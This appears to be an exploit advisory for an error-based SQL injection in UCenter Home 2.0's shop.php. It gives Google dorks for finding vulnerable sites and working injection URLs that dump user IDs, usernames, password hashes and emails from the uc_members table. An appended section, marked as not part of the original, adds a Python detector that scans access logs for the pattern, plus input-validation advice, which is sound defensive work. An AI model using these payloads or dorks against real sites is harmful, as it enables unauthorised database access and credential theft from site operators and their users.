__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.
You edit DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
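
Detection sketch for defenders, added here as an example and not part of the original advisory: it scans web access logs for requests to shop.php whose shopid is not a plain integer and labels those that carry the error-based pattern described above. Assumptions: combined log format, a legitimate shopid is a short decimal integer, and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The second carries a
# shortened form of the error-based pattern quoted in this advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select'
    '%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20'
    'information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2011:10:01:00 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2011:10:02:00 +0000] "GET /index.php?uid=4 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens of the duplicate-key (error-based) technique named in the advisory.
ERROR_BASED_TOKENS = ("information_schema", "floor(rand(", "group by", "concat(")


def classify(line):
    """Return 'ok', 'non-numeric-shopid' or 'error-based-sqli' for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return "ok"
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ok"
    verdict = "ok"
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        # Assumption: a legitimate shopid is a short decimal integer.
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue
        lowered = re.sub(r"\s+", " ", value.lower())
        if sum(token in lowered for token in ERROR_BASED_TOKENS) >= 2:
            return "error-based-sqli"
        verdict = "non-numeric-shopid"
    return verdict


def scan(lines):
    """Return (verdict, client_ip) for every line that is not 'ok'."""
    return [(v, l.split()[0]) for l in lines if (v := classify(l)) != "ok"]


if __name__ == "__main__":
    for verdict, ip in scan(SAMPLE_LOG):
        print(verdict, ip)
```

The integer check is the reliable signal; the token match only labels the hit. Enforcing the same integer check on shopid in the application before the value reaches the SQL query closes the injection.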